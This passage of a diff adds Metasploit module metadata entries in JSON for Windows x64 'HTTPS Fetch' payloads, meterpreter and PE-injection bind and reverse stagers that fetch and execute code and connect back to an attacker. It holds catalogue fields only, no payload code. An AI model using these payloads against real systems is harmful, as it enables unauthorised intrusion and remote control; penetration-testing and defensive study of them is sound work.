HTTPS server.\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/meterpreter/bind_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/meterpreter/bind_tcp_rc4", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/bind_tcp_rc4" + }, + "payload_cmd/windows/https/x64/meterpreter/bind_tcp_uuid": { + "name": "HTTPS Fetch, Bind TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/cmd/windows/https/x64/meterpreter/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for a connection with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/meterpreter/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + 
"needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/meterpreter/bind_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/bind_tcp_uuid" + }, + "payload_cmd/windows/https/x64/meterpreter/reverse_http": { + "name": "HTTPS Fetch, Windows x64 Reverse HTTP Stager (wininet)", + "fullname": "payload/cmd/windows/https/x64/meterpreter/reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nTunnel communication over HTTP (Windows x64 wininet)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/meterpreter/reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/meterpreter/reverse_http", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/reverse_http" + }, + "payload_cmd/windows/https/x64/meterpreter/reverse_https": { + "name": "HTTPS Fetch, Windows x64 Reverse HTTP Stager (wininet)", + "fullname": "payload/cmd/windows/https/x64/meterpreter/reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "skape ", + "sf ", + "OJ Reeves", + "hdm ", + "agix", + 
"rwincey" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nTunnel communication over HTTP (Windows x64 wininet)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/meterpreter/reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/meterpreter/reverse_https", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/reverse_https" + }, + "payload_cmd/windows/https/x64/meterpreter/reverse_named_pipe": { + "name": "HTTPS Fetch, Windows x64 Reverse Named Pipe (SMB) Stager", + "fullname": "payload/cmd/windows/https/x64/meterpreter/reverse_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to the attacker via a named pipe pivot", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/meterpreter/reverse_named_pipe", + 
"check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/meterpreter/reverse_named_pipe", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/reverse_named_pipe" + }, + "payload_cmd/windows/https/x64/meterpreter/reverse_tcp": { + "name": "HTTPS Fetch, Windows x64 Reverse TCP Stager", + "fullname": "payload/cmd/windows/https/x64/meterpreter/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to the attacker (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/meterpreter/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/meterpreter/reverse_tcp", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/reverse_tcp" + }, + "payload_cmd/windows/https/x64/meterpreter/reverse_tcp_rc4": { + "name": "HTTPS Fetch, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/https/x64/meterpreter/reverse_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": 
"payload", + "author": [ + "Brendan Watters", + "skape ", + "sf ", + "OJ Reeves", + "hdm ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/meterpreter/reverse_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/meterpreter/reverse_tcp_rc4", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/reverse_tcp_rc4" + }, + "payload_cmd/windows/https/x64/meterpreter/reverse_tcp_uuid": { + "name": "HTTPS Fetch, Reverse TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/cmd/windows/https/x64/meterpreter/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to the attacker with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": 
"/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/meterpreter/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/meterpreter/reverse_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/reverse_tcp_uuid" + }, + "payload_cmd/windows/https/x64/meterpreter/reverse_winhttp": { + "name": "HTTPS Fetch, Windows x64 Reverse HTTP Stager (winhttp)", + "fullname": "payload/cmd/windows/https/x64/meterpreter/reverse_winhttp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nTunnel communication over HTTP (Windows x64 winhttp)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/meterpreter/reverse_winhttp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/meterpreter/reverse_winhttp", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/reverse_winhttp" + }, + "payload_cmd/windows/https/x64/meterpreter/reverse_winhttps": { + "name": "HTTPS Fetch, 
Windows x64 Reverse HTTPS Stager (winhttp)", + "fullname": "payload/cmd/windows/https/x64/meterpreter/reverse_winhttps", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nTunnel communication over HTTPS (Windows x64 winhttp)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/meterpreter/reverse_winhttps", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/meterpreter/reverse_winhttps", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/reverse_winhttps" + }, + "payload_cmd/windows/https/x64/meterpreter_bind_named_pipe": { + "name": "HTTPS Fetch, Windows Meterpreter Shell, Bind Named Pipe Inline (x64)", + "fullname": "payload/cmd/windows/https/x64/meterpreter_bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "UserExistsError", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect to victim and spawn a Meterpreter shell. 
Requires Windows XP SP2 or newer.", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/meterpreter_bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/meterpreter_bind_named_pipe", + "staged": false + }, + "payload_cmd/windows/https/x64/meterpreter_bind_tcp": { + "name": "HTTPS Fetch, Windows Meterpreter Shell, Bind TCP Inline (x64)", + "fullname": "payload/cmd/windows/https/x64/meterpreter_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "OJ Reeves", + "sf " + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect to victim and spawn a Meterpreter shell. 
Requires Windows XP SP2 or newer.", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/meterpreter_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/meterpreter_bind_tcp", + "staged": false + }, + "payload_cmd/windows/https/x64/meterpreter_reverse_http": { + "name": "HTTPS Fetch, Windows Meterpreter Shell, Reverse HTTP Inline (x64)", + "fullname": "payload/cmd/windows/https/x64/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "OJ Reeves", + "sf " + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to attacker and spawn a Meterpreter shell. 
Requires Windows XP SP2 or newer.", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/meterpreter_reverse_http", + "staged": false + }, + "payload_cmd/windows/https/x64/meterpreter_reverse_https": { + "name": "HTTPS Fetch, Windows Meterpreter Shell, Reverse HTTPS Inline (x64)", + "fullname": "payload/cmd/windows/https/x64/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "OJ Reeves", + "sf " + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to attacker and spawn a Meterpreter shell. 
Requires Windows XP SP2 or newer.", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/meterpreter_reverse_https", + "staged": false + }, + "payload_cmd/windows/https/x64/meterpreter_reverse_ipv6_tcp": { + "name": "HTTPS Fetch, Windows Meterpreter Shell, Reverse TCP Inline (IPv6) (x64)", + "fullname": "payload/cmd/windows/https/x64/meterpreter_reverse_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "OJ Reeves", + "sf " + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to attacker and spawn a Meterpreter shell. 
Requires Windows XP SP2 or newer.", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/meterpreter_reverse_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/meterpreter_reverse_ipv6_tcp", + "staged": false + }, + "payload_cmd/windows/https/x64/meterpreter_reverse_tcp": { + "name": "HTTPS Fetch, Windows Meterpreter Shell, Reverse TCP Inline x64", + "fullname": "payload/cmd/windows/https/x64/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "OJ Reeves", + "sf " + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to attacker and spawn a Meterpreter shell. 
Requires Windows XP SP2 or newer.", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/meterpreter_reverse_tcp", + "staged": false + }, + "payload_cmd/windows/https/x64/peinject/bind_ipv6_tcp": { + "name": "HTTPS Fetch, Windows x64 IPv6 Bind TCP Stager", + "fullname": "payload/cmd/windows/https/x64/peinject/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "ege ", + "sf " + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for an IPv6 connection (Windows x64)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/peinject/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/peinject/bind_ipv6_tcp", + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": 
"windows/x64/bind_ipv6_tcp" + }, + "payload_cmd/windows/https/x64/peinject/bind_ipv6_tcp_uuid": { + "name": "HTTPS Fetch, Windows x64 IPv6 Bind TCP Stager with UUID Support", + "fullname": "payload/cmd/windows/https/x64/peinject/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "ege ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for an IPv6 connection with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/peinject/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/peinject/bind_ipv6_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" + }, + "payload_cmd/windows/https/x64/peinject/bind_named_pipe": { + "name": "HTTPS Fetch, Windows x64 Bind Named Pipe Stager", + "fullname": "payload/cmd/windows/https/x64/peinject/bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "ege ", + "UserExistsError" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for a pipe connection (Windows x64)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, 
+ "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/peinject/bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/peinject/bind_named_pipe", + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/bind_named_pipe" + }, + "payload_cmd/windows/https/x64/peinject/bind_tcp": { + "name": "HTTPS Fetch, Windows x64 Bind TCP Stager", + "fullname": "payload/cmd/windows/https/x64/peinject/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "ege ", + "sf " + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for a connection (Windows x64)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/peinject/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/peinject/bind_tcp", + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/bind_tcp" + }, + "payload_cmd/windows/https/x64/peinject/bind_tcp_rc4": { + "name": "HTTPS Fetch, Bind TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/https/x64/peinject/bind_tcp_rc4", + "aliases": [], + "rank": 
300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "ege ", + "hdm ", + "skape ", + "sf ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to the attacker", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/peinject/bind_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/peinject/bind_tcp_rc4", + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/bind_tcp_rc4" + }, + "payload_cmd/windows/https/x64/peinject/bind_tcp_uuid": { + "name": "HTTPS Fetch, Bind TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/cmd/windows/https/x64/peinject/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "ege ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for a connection with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/peinject/bind_tcp_uuid", + "check": false, + "post_auth": false, + 
"default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/peinject/bind_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/bind_tcp_uuid" + }, + "payload_cmd/windows/https/x64/peinject/reverse_named_pipe": { + "name": "HTTPS Fetch, Windows x64 Reverse Named Pipe (SMB) Stager", + "fullname": "payload/cmd/windows/https/x64/peinject/reverse_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "ege ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to the attacker via a named pipe pivot", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/peinject/reverse_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/peinject/reverse_named_pipe", + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/reverse_named_pipe" + }, + "payload_cmd/windows/https/x64/peinject/reverse_tcp": { + "name": "HTTPS Fetch, Windows x64 Reverse TCP Stager", + "fullname": "payload/cmd/windows/https/x64/peinject/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "ege ", + "sf " + ], + "description": "Fetch and execute an x64 payload from an HTTPS 
server.\nConnect back to the attacker (Windows x64)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/peinject/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/peinject/reverse_tcp", + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/reverse_tcp" + }, + "payload_cmd/windows/https/x64/peinject/reverse_tcp_rc4": { + "name": "HTTPS Fetch, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/https/x64/peinject/reverse_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "ege ", + "hdm ", + "skape ", + "sf ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to the attacker", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/peinject/reverse_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + 